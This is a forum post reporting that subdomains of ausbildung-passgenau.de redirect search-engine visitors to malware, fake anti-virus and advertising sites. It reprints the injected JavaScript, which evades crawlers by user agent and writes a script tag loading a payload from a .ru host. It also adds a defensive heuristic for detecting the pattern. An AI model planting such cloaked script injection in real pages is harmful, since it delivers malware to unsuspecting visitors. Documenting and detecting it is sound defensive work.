ausbildung-passgenau.de – a potpourri of badware!

neeklamy:
There are a few subdomains at ausbildung-passgenau.de with pages that, if visited from a search engine results page (so there’s a certain document referrer), will then redirect to a randomised pick of malware, fake anti-virus and advertising sites.

Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:

* fullfilescenter.ausbildung-passgenau.de
* newfiles2016.ausbildung-passgenau.de
* fastwindows2016.ausbildung-passgenau.de

This Google search results page will show any of the links in action: https://www.google.co.uk/search?q=site:ausbildung-passgenau.de

This is the JavaScript doing the dirty work:


--- Code: ---
<script type="text/javascript">
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
  if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
  || (ref.indexOf("google.") > 0)
  || ref.indexOf("rambler.") > 0
  || ref.indexOf("bing.") > 0
  || ref.indexOf("mail.") > 0
  || ref.indexOf("yahoo.") > 0
  || ref.indexOf("msn.") > 0
  || ref.indexOf("live.") > 0
  || ref.indexOf("vk.") > 0
  || showme == 'force') {
    document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
  }
}
</script>
--- End code ---
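
A defender-side triage heuristic for the pattern in the snippet above, as an added example that is not part of the original post: it flags inline scripts that gate on search-engine referrers and then `document.write` a split `<script>` tag. The function names, hint lists, thresholds and the `example.invalid` sample are assumptions made for illustration.

```javascript
// Added example: static triage heuristic, not code from the original post.
const ENGINE_HINTS = ["google.", "yandex.", "rambler.", "bing.", "yahoo.", "msn.", "live.", "mail.", "vk."];
const CRAWLER_HINTS = ["Googlebot", "Google", "Yandex", "Rambler", "Yaho", "Turtle"];
const WRITE_SCRIPT = /document\.write(?:ln)?\s*\([^)]*<script[^>]*\bsrc\s*=\s*\\?["']([^"'\\]+)/i;

// Collapse 'a' + 'b' concatenations so a tag split as '<sc' + 'ript' becomes visible.
function joinSplitStrings(src) {
  return src.replace(/(['"])\s*\+\s*(['"])/g, (m, a, b) => (a === b ? "" : m));
}

// Inspect the text of one inline <script> and report its gating and injection traits.
function analyzeInlineScript(src) {
  const joined = joinSplitStrings(src);
  const quoted = (s) => joined.includes('"' + s + '"') || joined.includes("'" + s + "'");
  const engines = ENGINE_HINTS.filter(quoted);
  const crawlers = CRAWLER_HINTS.filter(quoted);
  const inj = WRITE_SCRIPT.exec(joined);
  let host = null;
  if (inj) {
    try { host = new URL(inj[1]).hostname; } catch (e) { host = null; }
  }
  // Assumed threshold: two or more search-engine substrings next to a referrer read.
  const referrerGated = /document\.referrer/.test(joined) && engines.length >= 2;
  return {
    referrerGated,
    crawlerEvasion: /navigator\.userAgent/.test(joined) && crawlers.length >= 2,
    engines,
    injectedSrc: inj ? inj[1] : null,
    injectedHost: host,
    // True when the <script src> only appears after the string pieces are joined.
    splitTag: inj !== null && !WRITE_SCRIPT.test(src),
    suspicious: referrerGated && inj !== null,
  };
}

// Constructed, defanged sample modelled on the snippet above (example.invalid is a placeholder).
const SAMPLE = `
(0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
  if (ref.indexOf("google.") > 0 || ref.indexOf("bing.") > 0) {
    document.write('<sc' + 'ript type="text/javascript" src="http://cdn.example.invalid/loader.js"></sc' + 'ript>');
  }
}`;

console.log(analyzeInlineScript(SAMPLE));
```

Because the gate depends on the referrer and user agent, a plain fetch of the page will not load the second-stage script; inspecting the inline source as above avoids that blind spot.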
